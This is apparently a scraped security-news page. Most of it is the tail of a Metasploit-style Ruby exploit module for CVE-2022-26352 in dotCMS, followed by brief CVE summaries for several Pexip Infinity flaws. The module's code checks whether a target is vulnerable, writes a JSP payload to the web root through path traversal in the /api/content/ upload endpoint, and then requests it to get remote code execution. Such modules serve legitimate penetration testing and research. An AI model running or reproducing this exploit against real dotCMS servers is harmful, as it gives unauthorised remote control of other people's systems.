vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

CVE-2022-26352: dotCMS Shell Upload ≈ Packet Storm

Pexip Infinity 27 before 28.0 allows remote attackers to trigger excessive resource consumption and termination because of registrar resource mishandling.

CVE-2022-29286: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via HTTP.

CVE-2022-27934: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity 27.x before 27.2 has Improper Access Control. An attacker can sometimes join a conference (call join) if it has a lock but not a PIN.

Tag

#ssl